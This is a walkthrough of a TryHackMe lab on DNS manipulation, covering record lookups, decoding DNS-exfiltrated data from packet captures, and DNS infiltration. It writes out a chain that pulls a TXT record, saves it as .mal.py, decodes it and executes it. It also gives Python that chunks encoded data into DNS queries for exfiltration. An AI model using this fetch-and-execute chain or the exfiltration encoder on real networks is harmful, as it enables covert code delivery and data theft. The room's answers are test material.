
【TryHackMe】DNS Manipulation: Walkthrough


Overview

This is a walkthrough of the TryHackMe room "DNS Manipulation".

Task4

Q1.If you were on Windows, what command could you use to query a txt record for 'youtube.com'?

The -type option of nslookup selects the record type to query.

A.nslookup -type=txt youtube.com

Q2.If you were on Linux, what command could you use to query a txt record for 'facebook.com'?

A.dig facebook.com txt

Q3.AAAA stores what type of IP Address along with the hostname?

A.IPv6

Q4.Maximum characters for a DNS TXT Record is 256. (Yay/Nay)

A single string in a TXT record is limited to 255 octets, not 256 (a TXT record can carry several such strings, which resolvers and applications concatenate).

A.Nay

Q5.What DNS Record provides a domain name in reverse-lookup? (Research)

A.PTR

Q6.What would the reverse-lookup be for the following IPv4 Address? (192.168.203.2) (Research)

$ dig -x 192.168.203.2              

; <<>> DiG 9.19.19-1-Debian <<>> -x 192.168.203.2
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 42382
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;2.203.168.192.in-addr.arpa.    IN      PTR

;; Query time: 4 msec
;; SERVER: 192.168.11.1#53(192.168.11.1) (UDP)
;; WHEN: Thu Jan 23 09:48:55 EST 2025
;; MSG SIZE  rcvd: 55

A.2.203.168.192.in-addr.arpa.
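The reverse-lookup name dig built above is the IPv4 octets in reverse order under in-addr.arpa. As an added example (not part of the room or this walkthrough), the helper below builds that PTR query name, and also the IPv6 form, which is the case people usually get wrong: all 32 hex nibbles of the fully expanded address, reversed, under ip6.arpa. The function name reverse_pointer and the sample addresses are mine.

```python
import ipaddress


def reverse_pointer(addr: str) -> str:
    """Return the PTR query name (with trailing dot) for an IPv4 or IPv6 literal.

    IPv4: dotted octets reversed, under in-addr.arpa.
          192.168.203.2 -> 2.203.168.192.in-addr.arpa.
    IPv6: the 32 nibbles of the expanded address reversed, one per label,
          under ip6.arpa (zero groups must be expanded, not compressed).
    """
    ip = ipaddress.ip_address(addr)  # validates the literal; rejects junk like "1.2.3"
    if ip.version == 4:
        return ".".join(reversed(str(ip).split("."))) + ".in-addr.arpa."
    nibbles = ip.exploded.replace(":", "")  # e.g. 2001:db8::1 -> 32 hex digits
    return ".".join(reversed(nibbles)) + ".ip6.arpa."


if __name__ == "__main__":
    # Constructed sample inputs for a stand-alone run.
    for sample in ("192.168.203.2", "2001:db8::1"):
        print(sample, "->", reverse_pointer(sample))
```

`dig -x` performs exactly this transformation for you; the function is useful when you need to generate PTR names in bulk, for example to check that the reverse zone for a subnet is populated, or to spot PTR answers that do not match the forward record.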

Task5

Q1.What is the maximum length of a DNS name? (Research) (Length includes dots!)

The limit is 253 characters in textual form, dots included. On the wire a name is at most 255 octets, and each individual label is at most 63.

A.253

Task7

Q1.What is the Transaction name? (Type it as you see it)

SSH into the target machine.

$ ssh user@10.10.110.36
user@user1:~$

Check the TASK file.

user@user1:~/dns-exfil-infil$ cat ../challenges/exfiltration/orderlist/TASK 
The order.pcap file has suspecious queries. Use the ~/dns-exfil-infil/packetyGrabber.py to decode
the data and answer the questions accrodingly.

IDENTIFY THE DOMAIN NAME USED TO EXFILTRATE DATA
use the following command to see all DNS Queries
tshark -r order.pcap -T fields -e dns.qry.name
(ignore the .localdomain part)

Use the packetyGrabber.py located in ~/dns-exfil-infil/ folder to decode the DNS queries to a plain-text file.
python3 ~/dns-exfil-infil/packetyGrabber.py

IGNORE THE EXCEPTION THROWN AT THE END OF SCRIPT

Listing the DNS query names in the pcap with tshark shows that the exfiltration domain is badbaddoma.in (the encoded data is carried in the leftmost label of each query).

user@user1:~/challenges/exfiltration/orderlist$ tshark -r order.pcap -T fields -e dns.qry.name
8.8.8.8.in-addr.arpa
g3KvmYb7QTUtBwLWHzLVvci.badbaddoma.in.localdomain
g3KvmYb7QTUtBwLWHzLVvci.badbaddoma.in.localdomain
g3KvmYb7QTUtBwLWHzLVvci.badbaddoma.in.localdomain
g3KvmYb7QTUtBwLWHzLVvci.badbaddoma.in.localdomain

(omitted)

Run packetyGrabber.py.

user@user1:~/challenges/exfiltration/orderlist$ python3 ~/dns-exfil-infil/packetyGrabber.py
File captured: /home/user/challenges/exfiltration/orderlist/order.pcap
Filename output: order.txt
Domain Name (Example: badbaddoma.in): badbaddoma.in
[+] Domain Name set to badbaddoma.in
[+] Filtering for your domain name.
[+] Base58 decoded.
[+] Base64 decoded.
[+] Output to order.txt

Check the output file.

user@user1:~/challenges/exfiltration/orderlist$ cat order.txt 
DATE    ORDER-ID        TRANSACTION     PRICE      CODE
01-06      1            Network Equip.  $2349.99    -
01-09      2            Software Licen. $1293.49    -
01-11      3            Physical Secur. $7432.79    -
02-06      4            SENT TO #1056.. $15040.23   -
02-06      5            1M THM VOUCHER  $10        zSiSeC
02-06      6            Firewall        $2500       -

A.Network Equip.

Q2.How much was the Firewall? (Without the $)

A.2500

Q3.Which file contains suspicious DNS queries?

Check the challenges/exfiltration/identify/TASK file.

user@user1:~/challenges/exfiltration/orderlist$ cat ../identify/TASK
Steps on how to solve this task:
1. Identify which file contains the suspicious dns queries.
2. Identify what domain name was used to exfiltrate the data.
( You can use tshark to filter the dns query name )
( Google how to filter dns query names with tshark )
3. Run ~/dns-exfil-infil/packetyGrabber.py and put the correct inputs in.

If you do everything correctly you will be able to answer the last 2 questions.

cap3.pcap is the capture that contains queries for the suspicious domain.

$ tshark -r cap3.pcap -T fields -e dns.qry.name
g5SUFQJi3BgPBgh2jYe5Vhm.badbaddoma.in
g5SUFQJi3BgPBgh2jYe5Vhm.badbaddoma.in

A.cap3.pcap

Q4.Enter the plain-text after you have decoded the data using packetyGrabber.py found in ~/dns-exfil-infil/ folder.

Run packetyGrabber.py.

user@user1:~/challenges/exfiltration/identify$ python3 ~/dns-exfil-infil/packetyGrabber.py
File captured: /home/user/challenges/exfiltration/identify/cap3.pcap
Filename output: cap3.txt
Domain Name (Example: badbaddoma.in): badbaddoma.in
[+] Domain Name set to badbaddoma.in
[+] Filtering for your domain name.
[+] Base58 decoded.
[+] Base64 decoded.
[+] Output to cap3.txt

The decoded output file contains a set of credentials.

$ cat cap3.txt 
administrator:s3cre7P@ssword

A.administrator:s3cre7P@ssword

Task8

Q1.What type of DNS Record is usually used to infiltrate data into a network?

A.TXT

Task10

Q1.Enter the output from the executed python file

Check the TASK file.

user@user1:~/challenges/infiltration$ cat TASK 
For this TASK we will be requesting a TXT Record from my public domain name.
Here is the information needed to complete this challenge:

My Domain Name: badbaddoma.in
Request TXT Record from this subdomain: code
Save the text value to a python file
Run the ~/dns-exfil-infil/packetySimple.py to decode the text
Run the program: python3 [your-file-name].py
Take a note of the output and answer the question in the "DNS Infiltration - Practice" section.

Query the TXT record for the code subdomain. Note that the TASK file names badbaddoma.in, but the record queried here is code.nodrc.com.

user@user1:~/challenges/infiltration$ nslookup -type=TXT code.nodrc.com
Server:         10.0.0.2
Address:        10.0.0.2#53

Non-authoritative answer:
code.nodrc.com  text = "YeeTbunLbACdXq193g6VHXRuDQ9Y1upaAzA3UkpCr8yBBE68JEXU32wxNE44"

Extract only the value of the TXT record.

user@user1:~/challenges/infiltration$ nslookup -type=TXT code.nodrc.com | grep Yee | cut -d \" -f2
YeeTbunLbACdXq193g6VHXRuDQ9Y1upaAzA3UkpCr8yBBE68JEXU32wxNE44

Save it as .mal.py.

$ nslookup -type=TXT code.nodrc.com | grep Yee | cut -d \" -f2 > .mal.py

Run packetySimple.py and give it .mal.py as the filename. The script decodes the file in place (Base58, then Base64).

$ python3 ~/dns-exfil-infil/packetySimple.py
Filename: .mal.py
[+] Reading from file...
[+] Base58 decoded.
[+] Base64 decoded.
[+] Done, .mal.py is decoded.

Run .mal.py. Outside a lab, inspect the decoded source before executing it; running an unreviewed script delivered over DNS is exactly what this infiltration technique is designed to achieve.

$ python3 .mal.py 
4.4.0-186-generic

A.4.4.0-186-generic
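Both the exfiltration tasks (Task 7, where the data rides in the leftmost label of each query and packetyGrabber.py reassembles and decodes it) and the infiltration task (Task 10, where a whole script sits in one TXT record and packetySimple.py decodes it) use the same two-layer encoding: base64, then base58. The block below is an added example, not the room's packetyGrabber.py or packetySimple.py; it reimplements that decoding from scratch so you can see what those scripts do. Assumptions, which are mine and not confirmed by the room: the payload is base64-encoded, then base58-encoded (Bitcoin alphabet), then either cut into fixed-size labels for exfiltration or stored whole in a TXT string; repeated queries in the capture are retransmissions of the same label. The function names, the 23-character label size (taken from the label length seen in the captures) and the sample inputs are constructed for this example.

```python
import base64

# Bitcoin-style base58 alphabet (no 0, O, I, l), so every label is a valid DNS label.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58encode(data: bytes) -> str:
    """Base58-encode bytes; leading zero bytes become leading '1' characters."""
    pad = len(data) - len(data.lstrip(b"\x00"))
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = B58_ALPHABET[r] + out
    return "1" * pad + out


def b58decode(text: str) -> bytes:
    """Inverse of b58encode; rejects characters outside the alphabet."""
    pad = len(text) - len(text.lstrip("1"))
    n = 0
    for ch in text:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError("not a base58 character: %r" % ch)
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return b"\x00" * pad + body


def encode_payload(plaintext: str) -> str:
    """base64 first, then base58 (assumed order, matching the decode steps the room prints)."""
    return b58encode(base64.b64encode(plaintext.encode()))


def decode_payload(encoded: str) -> str:
    """The '[+] Base58 decoded' / '[+] Base64 decoded' steps in one call."""
    return base64.b64decode(b58decode(encoded)).decode()


def build_queries(plaintext: str, domain: str, label_len: int = 23, repeats: int = 2) -> list:
    """Constructed exfiltration traffic: chunk the encoded payload into DNS labels.
    Each query is repeated to mimic the retransmissions visible in order.pcap."""
    enc = encode_payload(plaintext)
    labels = [enc[i:i + label_len] for i in range(0, len(enc), label_len)]
    return ["%s.%s" % (lab, domain) for lab in labels for _ in range(repeats)]


def extract_exfil(query_names, domain: str) -> str:
    """Given the lines of `tshark -r x.pcap -T fields -e dns.qry.name`, keep only
    queries under the attacker's domain (ignoring a trailing .localdomain), collapse
    consecutive duplicates (retransmissions), reassemble the labels and decode."""
    suffix = "." + domain
    labels = []
    for q in query_names:
        q = q.strip().rstrip(".")
        if q.endswith(".localdomain"):
            q = q[: -len(".localdomain")]
        if not q.endswith(suffix):
            continue  # e.g. 8.8.8.8.in-addr.arpa: unrelated noise
        label = q[: -len(suffix)]
        if not labels or labels[-1] != label:
            labels.append(label)
    return decode_payload("".join(labels))


def decode_txt_record(txt_value: str) -> str:
    """Infiltration: the TXT string carries the whole base58(base64(script)).
    Strips the quotes nslookup/dig print around the value."""
    return decode_payload(txt_value.strip().strip('"'))


if __name__ == "__main__":
    # Constructed sample capture: one PTR lookup plus the chunked, repeated queries.
    sample_queries = ["8.8.8.8.in-addr.arpa"] + [
        q + ".localdomain" for q in build_queries("administrator:s3cre7P@ssword", "badbaddoma.in")
    ]
    print("\n".join(sample_queries[:3]), "...")
    print("exfil ->", extract_exfil(sample_queries, "badbaddoma.in"))
    # Constructed TXT value carrying a small script, as in Task 10.
    txt = '"' + encode_payload("import platform\nprint(platform.release())\n") + '"'
    print("infil ->", repr(decode_txt_record(txt)))
```

To use it against a real capture, pipe the tshark field output into extract_exfil (for example `tshark -r order.pcap -T fields -e dns.qry.name` read line by line from stdin). Collapsing only consecutive duplicates matters: de-duplicating every repeated label would silently corrupt a payload whose encoded text happens to contain the same chunk twice.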

Task11

Q1.What program was used to Tunnel HTTP over DNS?

A.iodine
